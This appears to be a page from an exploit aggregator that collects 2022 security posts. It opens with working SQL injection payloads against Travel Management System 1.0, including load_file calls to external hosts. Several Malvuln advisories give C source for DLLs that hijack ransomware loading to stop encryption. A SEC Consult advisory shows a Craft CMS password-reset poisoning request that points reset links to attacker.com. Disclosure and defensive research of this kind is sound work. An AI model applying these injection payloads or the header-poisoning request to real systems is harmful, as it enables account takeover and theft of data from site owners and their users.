Latest exploits :: CodePwn

<pre><code>## Title: Travel Management System 1.0 Multiple SQLi ## Author: nu11secur1ty ## Date: 05.07.2022 ## Vendor: https://code-projects.org/author/fabian/ ## Software: https://code-projects.org/travel-management-system-using-php-source-code/ ## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-28079 ## Description: The pid, subcatid and catid parameters appear to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\sc8xrq6pkgxzxgwiy0hepo3sgjmca2yt1hs4is7.tapak.com\\fez'))+' was submitted in the all parameters. This payload injects a SQL sub-queries that call MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can take administrator accounts control and also of all accounts on this system, also the malicious user can download all information about this system. Status: CRITICAL [+] Payloads: ```mysql --- Parameter: pid (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: pid=12'+(select load_file('\\\\sc8xrq6pkgxzxgwiy0hepo3sgjmca2yt1hs4is7.tapak.com\\fez'))+'' OR NOT 1485=1485 AND 'nTcz'='nTcz Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: pid=12'+(select load_file('\\\\sc8xrq6pkgxzxgwiy0hepo3sgjmca2yt1hs4is7.tapak.com\\fez'))+'' OR (SELECT 7369 FROM(SELECT COUNT(*),CONCAT(0x716b767671,(SELECT (ELT(7369=7369,1))),0x717a6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OIAM'='OIAM Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: pid=12'+(select load_file('\\\\sc8xrq6pkgxzxgwiy0hepo3sgjmca2yt1hs4is7.tapak.com\\fez'))+'' AND (SELECT 4768 FROM (SELECT(SLEEP(5)))llcY) AND 'EiGX'='EiGX Type: UNION query Title: MySQL UNION query (NULL) - 4 columns Payload: pid=12'+(select load_file('\\\\sc8xrq6pkgxzxgwiy0hepo3sgjmca2yt1hs4is7.tapak.com\\fez'))+'' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b767671,0x5a716d6f4e64696f557a4d784663766d435a634a6d4d434b4b477057454a537a45516d445a77767a,0x717a6b7871),NULL,NULL,NULL# --- --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --- Parameter: subcatid (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: subcatid=-4598' OR 9251=9251 AND 'kzhS'='kzhS Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: subcatid=7'+(select load_file('\\\\oogt3milwc9v9c8eawta1kfosfy8m6axdl48uwj.subcatid-tapak.com\\txz'))+'' AND (SELECT 2330 FROM(SELECT COUNT(*),CONCAT(0x717a7a7871,(SELECT (ELT(2330=2330,1))),0x716a6b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Qftm'='Qftm Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: subcatid=7'+(select load_file('\\\\oogt3milwc9v9c8eawta1kfosfy8m6axdl48uwj.subcatid-tapak.com\\txz'))+'' AND (SELECT 2506 FROM (SELECT(SLEEP(5)))yVKW) AND 'QRSS'='QRSS Type: UNION query Title: MySQL UNION query (NULL) - 4 columns Payload: subcatid=7'+(select load_file('\\\\oogt3milwc9v9c8eawta1kfosfy8m6axdl48uwj.subcatid-tapak.com\\txz'))+'' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a7a7871,0x4142654745746c4c54786a476756684b7864575669645759754f694d5671586a51506a474a475652,0x716a6b7a71),NULL,NULL,NULL# --- ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --- Parameter: catid (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: catid=-9719' OR 2503=2503 AND 'ydxn'='ydxn Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: catid=3'+(select load_file('\\\\wee1tu8tmkz3zkym04jirs5winogc80z3nuaky9.catidtapak.com\\hwa'))+'' AND (SELECT 9602 FROM(SELECT COUNT(*),CONCAT(0x71786b6a71,(SELECT (ELT(9602=9602,1))),0x7170626b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'xPSh'='xPSh Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: catid=3'+(select load_file('\\\\wee1tu8tmkz3zkym04jirs5winogc80z3nuaky9.catidtapak.com\\hwa'))+'' AND (SELECT 1843 FROM (SELECT(SLEEP(5)))XNBw) AND 'KRBS'='KRBS Type: UNION query Title: MySQL UNION query (NULL) - 4 columns Payload: catid=3'+(select load_file('\\\\wee1tu8tmkz3zkym04jirs5winogc80z3nuaky9.catidtapak.com\\hwa'))+'' UNION ALL SELECT NULL,CONCAT(0x71786b6a71,0x62596c6a72746a584a7048484a70435867556a656d6e5a734474725650477853527466545071436a,0x7170626b71),NULL,NULL,NULL# --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/Travel-Management-System) ## Proof and Exploit: [href](https://streamable.com/8nroqp) </code></pre>

<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022 Original source: https://malvuln.com/advisory/8ed9a60127aee45336102bf12059a850.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Ransom.Petya Vulnerability: Code Execution Description: Petya looks for and loads a DLL named "wow64log.dll" in Windows\System32. Therefore, we can drop our own DLL to intercept and terminate the malware pre-encryption. The exploit dll will simply display a Win32API message box and call exit(). The exploit DLL must export "InterlockedExchange" function or it fails with error. We do not need to rely on hash signature or third-party product, the malware will do the work for us. Endpoint protection systems and or antivirus can potentially be killed prior to executing malware, but this method cannot as theres nothing to kill the DLL just lives on disk waiting. From defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment. Family: Petya Type: PE32 MD5: 8ed9a60127aee45336102bf12059a850 Vuln ID: MVID-2022-0591 Disclosure: 05/06/2022 Video PoC URL: https://www.youtube.com/watch?v=p88FI5lZuRQ Exploit/PoC: 1) Compile the following C code as "wow64log.dll" as x64 2) Place the DLL in Windows\System32 3) Run the malware #include "windows.h" //By malvuln //Purpose: Exploit Ransom.Petya //MD5: 8ed9a60127aee45336102bf12059a850 /** DISCLAIMER: Author is NOT responsible for any damages whatsoever by using this software or improper malware handling. By using this code you assume and accept all risk implied or otherwise. **/ //compile as x64 //gcc -c wow64log.c //gcc -shared -o wow64log.dll wow64log.o //DLL must live under Windows\System32 dir BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){ switch (reason) { case DLL_PROCESS_ATTACH: MessageBox(NULL, "Code Exec", "by malvuln", MB_OK); exit(0); break; } return TRUE; } extern __declspec(dllexport) WINBASEAPI LONG WINAPI InterlockedExchange (LONG volatile *Target, LONG Value){ exit(1); } Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022 Original source: https://malvuln.com/advisory/2aea3b217e6a3d08ef684594192cafc8.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Ransom.Cryakl Vulnerability: Code Execution Description: Cryakl looks for and loads a DLL named "wow64log.dll" in Windows\System32. Therefore, we can drop our own DLL to intercept and terminate the malware pre-encryption. The exploit dll will simply display a Win32API message box and call exit(). The exploit DLL must export "InterlockedExchange" function or it fails with error. We do not need to rely on hash signature or third-party product, the malware will do the work for us. Endpoint protection systems and or antivirus can potentially be killed prior to executing malware, but this method cannot as theres nothing to kill the DLL just lives on disk waiting. From defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment. Family: Cryakl Type: PE32 MD5: 2aea3b217e6a3d08ef684594192cafc8 Vuln ID: MVID-2022-0590 Disclosure: 05/06/2022 Video PoC URL: https://www.youtube.com/watch?v=uI7kr8gFTP4 Exploit/PoC: 1) Compile the following C code as "wow64log.dll" as x64 2) Place the DLL in Windows\System32 3) Run the malware #include "windows.h" //By malvuln //Purpose: Exploit Ransom.Cryakl //MD5: 2aea3b217e6a3d08ef684594192cafc8 /** DISCLAIMER: Author is NOT responsible for any damages whatsoever by using this software or improper malware handling. By using this code you assume and accept all risk implied or otherwise. **/ //compile as x64 //gcc -c wow64log.c //gcc -shared -o wow64log.dll wow64log.o //DLL must live under Windows\System32 dir BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){ switch (reason) { case DLL_PROCESS_ATTACH: MessageBox(NULL, "Code Exec", "by malvuln", MB_OK); exit(0); break; } return TRUE; } extern __declspec(dllexport) WINBASEAPI LONG WINAPI InterlockedExchange (LONG volatile *Target, LONG Value){ exit(1); } Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>Discovery / credits: Malvuln - (John Page aka hyp3rlinx) (c) 2022 Original source: https://malvuln.com/advisory/6152709e741c4d5a5d793d35817b4c3d.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Trojan-Ransom.Radamant Vulnerability: Code Execution Description: Radamant tries to load a DLL named "PROPSYS.dll" and execute a hidden PE file "DirectX.exe" from the AppData\Roaming directory. Therefore, we can drop our own DLL to intercept and terminate the malware pre-encryption. The exploit dll checks if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. We do not need to rely on hash signatures or third-party products, the malwares flaw does the work for us. Endpoint protection systems and or antivirus can potentially be killed prior to executing malware, but this method cannot as there's nothing to kill the DLL just lives on disk waiting. From a defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment. Family: Radamant Type: PE32 MD5: 6152709e741c4d5a5d793d35817b4c3d Vuln ID: MVID-2022-0589 Disclosure: 05/06/2022 Video PoC URL: https://www.youtube.com/watch?v=EToGLoZjR6Q Exploit/PoC: 1) Compile the following C code as "PROPSYS.dll" 32bit 2) Place the DLL in same directory as the ransomware 3) Optional - Hide it: attrib +s +h "PROPSYS.dll" 4) Run the malware #include "windows.h" //By malvuln //Purpose: Exploit Radamant //gcc -c PROPSYS.c -m32 //gcc -shared -o PROPSYS.dll PROPSYS.o -m32 BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){ switch (reason) { case DLL_PROCESS_ATTACH: MessageBox(NULL, "Code Exec", "by malvuln", MB_OK); TCHAR buf[MAX_PATH]; if(GetCurrentDirectory(MAX_PATH, buf)) if(strcmp("C:\\Windows\\System32", buf) != 0){ HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid()); if (NULL != handle) { TerminateProcess(handle, 0); CloseHandle(handle); } } break; } return TRUE; } Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>Discovery / credits: Malvuln - (John Page aka hyp3rlinx) (c) 2022 Original source: https://malvuln.com/advisory/209a288c68207d57e0ce6e60ebf60729.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Trojan.CryptoLocker Vulnerability: Code Execution Description: Cryptolocker drops a PE file in AppData\Roaming directory which then tries to load a DLL named "netapi32.dll". Therefore, we can drop our own DLL to intercept and terminate the malware pre-encryption. The exploit dll checks if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. We do not need to rely on hash signatures or third-party products, the malwares flaw does the work for us. Endpoint protection systems and or antivirus can potentially be killed prior to executing malware, but this method cannot as there's nothing to kill the DLL just lives on disk waiting. From a defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment. Family: CryptoLocker Type: PE32 MD5: 209a288c68207d57e0ce6e60ebf60729 Vuln ID: MVID-2022-0588 Disclosure: 05/06/2022 Video PoC URL: https://www.youtube.com/watch?v=sAp024n_dSk Exploit/PoC: 1) Compile the following C code as "netapi32.dll" 32bit 2) Place the DLL in same directory as the ransomware 3) Optional - Hide it: attrib +s +h "netapi32.dll" 4) Run the malware #include "windows.h" //By malvuln - 5/6/2022 //Purpose: Exploit CryptoLocker //gcc -c netapi32.c -m32 //gcc -shared -o netapi32.dll netapi32.o -m32 BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){ switch (reason) { case DLL_PROCESS_ATTACH: MessageBox(NULL, "Code Exec", "by malvuln", MB_OK); TCHAR buf[MAX_PATH]; if(GetCurrentDirectory(MAX_PATH, buf)) if(strcmp("C:\\Windows\\System32", buf) != 0){ HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid()); if (NULL != handle) { TerminateProcess(handle, 0); CloseHandle(handle); } } break; } return TRUE; } Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220505-0 > ======================================================================= title: Password Reset Poisoning Attack product: Craft CMS vulnerable version: 3.7.36 and potentially lower fixed version: none, see workaround by vendor CVE number: CVE-2022-29933 impact: high homepage: https://craftcms.com found: 2022-03-14 by: Sandro Einfeldt (Office Munich) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Atos company Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Craft is a flexible, user-friendly CMS for creating custom digital experiences on the web and beyond. It features: - An intuitive, user-friendly control panel for content creation and administrative tasks. - A clean-slate approach to content modeling and front-end development that doesn’t make any assumptions about your content or how it should be consumed. - A built-in Plugin Store with hundreds of free and commercial plugins, all just a click away. - A robust framework for module and plugin development. - An active, vibrant community." Source: https://craftcms.com/docs/3.x/ Business recommendation: ------------------------ The vendor responded that the vulnerability will not be fixed as a workaround is available. An in-depth security analysis performed by security professionals is highly advised, as the software may be affected from further security issues. Vulnerability overview/description: ----------------------------------- 1) Password Reset Poisoning Attack (CVE-2022-29933) The password reset function of the Craft CMS backend login page, usually accessible under https://<hostname>/index.php?p=admin/login, is vulnerable to a password reset poisoning attack. An unauthenticated attacker who knows valid email addresses or account names of Craft CMS backend users is able to manipulate the password reset functionality in a way that the registered users of the CMS receive password reset emails containing a malicious password reset link. The link contains valid (secret) tokens in the URL's GET parameters that are necessary to authenticate against the server's password reset function and enable a user who lost or forgot the account's password to reset the password. By manipulating the password reset request, an attacker is able to set an arbitrary hostname in the resulting password reset link. Thereby, the attacker can set the link to point to an attacker-controlled host. If a user clicks on the reset link, the valid reset tokens in the GET parameters will be sent to the attacker's web server and can be extracted from the server logs. The attacker is able to build a valid password reset link by adding the tokens to the general reset link structure: https://<hostname>/index.php?p=admin/set-password&code=<token1>&id=<token2> If the attacker calls the filled out URL with a web browser, the attacker will be able to reset the account's password and log in. Proof of concept: ----------------- 1) Password Reset Poisoning Attack (CVE-2022-29933) First, the attacker needs to browse the following URL: https://<hostname>/index.php?p=admin/login The login mask contains a link "Forgot your password?". Following this link, the attacker gets prompted to submit a valid account name or email address. After entering the account name or email address and pressing the "Reset Password" button, the attacker can intercept the resulting HTTP POST request with an intercepting web proxy (e.g. BurpSuite). The intercepted request can then be manipulated before getting forwarded to the server. The attacker needs to add the HTTP header X-Forwarded-Host: <attacker_host> while the value should contain the hostname of the webserver under the attacker's control. Manipulated Request: ------------------------------------------------------------------------------- POST /index.php?p=admin/actions/users/send-password-reset-email HTTP/1.1 Host: <IP> X-Forwarded-Host: www.attacker.com [...] Referer: http://<IP>/index.php?p=admin/login Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Registered-Asset-Bundles: ,craft\web\assets\login\[...] X-Registered-Js-Files: ,http://<IP>/cpresources/[...] X-CSRF-Token: c9kEDPROifmFNKSKhght_JgkBgnnk5EfXiH1qHA[...] X-Requested-With: XMLHttpRequest Content-Length: 38 Origin: http://<IP> Connection: close Cookie: CRAFT_CSRF_TOKEN=[...] loginName=test%40example.com ------------------------------------------------------------------------------- The resulting server response indicates that the request has been processed. Response: ------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Mon, 14 Mar 2022 08:19:24 GMT [...] X-Powered-By: Craft CMS Content-Length: 16 Connection: close Content-Type: application/json; charset=UTF-8 {"success":true} ------------------------------------------------------------------------------- The user will then receive a malicious password reset email pointing to the hostname that the attacker provided by adding the X-Forwarded-Host header. Email: ------------------------------------------------------------------------------- Hey Test, To reset your Test Install password, click on this link: http://www.attacker.com/index.php?p=admin/set-password&code=D6HWm7pGpYEt9mb-mPVh4kGzXWZ8ax5u&id=48b9fe48-91c9-430e-baa2-5bdf66c88102 If you were not expecting this email, just ignore it. ------------------------------------------------------------------------------- If the user is not aware and clicks on the link, the values of the reset tokens "code" and "id" will be sent to the attacker's web server. The attacker is then able to relay the tokens to the original reset endpoint and reset the password. Vulnerable / tested versions: ----------------------------- The following version has been tested and found to be vulnerable: * 3.7.36 Vendor contact timeline: ------------------------ 2022-03-10: Contacting vendor through contact form. 2022-03-14: Vendor provides Craft CMS installation for verifying the vulnerability. 2022-03-22: SEC Consult provides the vulnerability advisory through contact form. 2022-03-23: Vendor responded that there is a hardening measure available. 2022-03-31: SEC Consult replied that all installations of the current version (including the testing instance provided by the vendor) are vulnerable by default and the vulnerability is implementation-based and results from bad coding practices. Until 2022-05-02: No answer from vendor. 2022-05-03: Set advisory release date to 5th May. Informing vendor about scheduled advisory release. 2022-05-05: Release of security advisory. Solution: --------- The vendor knows about the vulnerability and the resulting risks. A possible hardening measure has to be implemented manually and is documented here: https://craftcms.com/knowledge-base/securing-craft#explicitly-set-the-web-alias-for-the-site https://craftcms.com/docs/3.x/sites.html#site-url The vendor responded that the vulnerability will not be fixed as a workaround is available. Workaround: ----------- The backend login interface and the password reset function should not be accessible from the internet or from any unknown IP addresses. The user must implement the workaround described in the hardening guide above in order to mitigate this issue. Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult, an Atos company Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Atos company. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF S. Einfeldt / @2022 </code></pre>

<pre><code>Discovery / credits: Malvuln - (John Page - aka hyp3rlinx) (c) 2022 Original source: https://malvuln.com/advisory/de25f04dedaffde1be47ef26dc9a8176.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Ransom.CTBLocker Vulnerability: Code Execution Description: CTBLocker looks for and executes DLLs in its current directory. Therefore, we can hijack a vuln DLL, execute our own code, control and terminate the malware pre-encryption. The exploit dll checks if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. We do not need to rely on hash signatures or third-party products, the malwares flaw does the work for us. Endpoint protection systems and or antivirus can potentially be killed prior to executing malware, but this method cannot as there's nothing to kill the DLL just lives on disk waiting. From a defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment. Family: CTBLocker Type: PE32 MD5: de25f04dedaffde1be47ef26dc9a8176 Vuln ID: MVID-2022-0586 Disclosure: 05/05/2022 Video PoC URL: https://www.youtube.com/watch?v=koXDYNI5ngQ Exploit/PoC: 1) Compile the following C code as "SHFOLDER.DLL" 32bit 2) Place the DLL in same directory as the ransomware 3) Optional - Hide it: attrib +s +h "SHFOLDER.DLL" 4) Run the malware #include "windows.h" //By malvuln - 5/5/2022 //Purpose: //gcc -c SHFOLDER.c -m32 //gcc -shared -o SHFOLDER.DLL SHFOLDER.o -m32 BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){ switch (reason) { case DLL_PROCESS_ATTACH: MessageBox(NULL, "Code Exec", "by malvuln", MB_OK); TCHAR buf[MAX_PATH]; if(GetCurrentDirectory(MAX_PATH, buf)) if(strcmp("C:\\Windows\\System32", buf) != 0){ HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid()); if (NULL != handle) { TerminateProcess(handle, 0); CloseHandle(handle); } } break; } return TRUE; } Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).</code></pre>

<pre><code>Discovery / credits: Malvuln - (John Page - aka hyp3rlinx) (c) 2022 Original source: https://malvuln.com/advisory/ae99e6a451bc53830be799379f5c1104.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Trojan-Ransom.Cerber Vulnerability: Code Execution Description: Cerber looks for and executes DLLs in its current directory. Therefore, we can hijack a vuln DLL, execute our own code, control and terminate the malware pre-encryption. The exploit dll checks if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. We do not need to rely on hash signatures or third-party products, the malwares flaw does the work for us. Endpoint protection systems and or antivirus can potentially be killed prior to executing malware, but this method cannot as there's nothing to kill the DLL just lives on disk waiting. From a defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment. Family: Cerber Type: PE32 MD5: ae99e6a451bc53830be799379f5c1104 Vuln ID: MVID-2022-0585 Disclosure: 05/05/2022 Video PoC URL: https://www.youtube.com/watch?v=1FVDZcrgN1U Exploit/PoC: 1) Compile the following C code as "CLDAPI.dll" 32bit 2) Place the DLL in same directory as the ransomware 3) Optional - Hide it: attrib +s +h "CLDAPI.dll" 4) Run the malware #include "windows.h" //By malvuln - 5/5/2022 //Purpose: //gcc -c CLDAPI.c -m32 //gcc -shared -o CLDAPI.dll CLDAPI.o -m32 /** DISCLAIMER: Author is NOT responsible for any damages whatsoever by using this software or improper malware handling. By using this code you assume and accept all risk implied or otherwise. **/ BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){ switch (reason) { case DLL_PROCESS_ATTACH: MessageBox(NULL, "Code Exec", "by malvuln", MB_OK); TCHAR buf[MAX_PATH]; if(GetCurrentDirectory(MAX_PATH, buf)) if(strcmp("C:\\Windows\\System32", buf) != 0){ HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid()); if (NULL != handle) { TerminateProcess(handle, 0); CloseHandle(handle); } } break; } return TRUE; } Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).</code></pre>

<pre><code>Discovery / credits: Malvuln - (John Page - aka hyp3rlinx) (c) 2022 Original source: https://malvuln.com/advisory/3b200c8173a92c94441cb062d38012f6.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Trojan-Ransom.LockerGoga Vulnerability: Code Execution Description: LockerGoga looks for and loads a DLL named "wow64log.dll" in Windows\System32. Therefore, we can drop our own DLL to intercept and terminate the malware pre-encryption. Four processes are created E.g. "imtvknqq9737.exe" running under AppData\Local\Temp, the process name is "imtvknqq" plus a appended random number. Our exploit dll will simply display a Win32API message box and call exit(). The exploit DLL must export "InterlockedExchange" function or it fails with error. We do not need to rely on hash signature or third-party product, the malwares own flaw will do the work for us. Endpoint protection systems and or antivirus can potentially be killed prior to executing malware, but this method cannot as theres nothing to kill the DLL just lives on disk waiting. From defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment. Family: LockerGoga Type: PE32 MD5: 3b200c8173a92c94441cb062d38012f6 Vuln ID: MVID-2022-0587 Disclosure: 05/05/2022 Video PoC URL: https://www.youtube.com/watch?v=1_7vmbHmCQQ Exploit/PoC: 1) Compile the following C code as "wow64log.dll" as x64 2) Place the DLL in Windows/System32 3) Run the malware then BOOM! #include "windows.h" //By malvuln - 5/2022 //Target: Trojan-Ransom.LockerGoga //MD5: 3b200c8173a92c94441cb062d38012f6 /** DISCLAIMER: Author is NOT responsible for any damages whatsoever by using this software or improper malware handling. By using this code you assume and accept all risk implied or otherwise. **/ //compile as x64 //gcc -c wow64log.c //gcc -shared -o wow64log.dll wow64log.o //DLL must live under Windows/System32 dir BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){ switch (reason) { case DLL_PROCESS_ATTACH: MessageBox(NULL, "Code Exec", "by malvuln", MB_OK); exit(0); break; } return TRUE; } extern __declspec(dllexport) WINBASEAPI LONG WINAPI InterlockedExchange (LONG volatile *Target, LONG Value){ exit(1); } Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>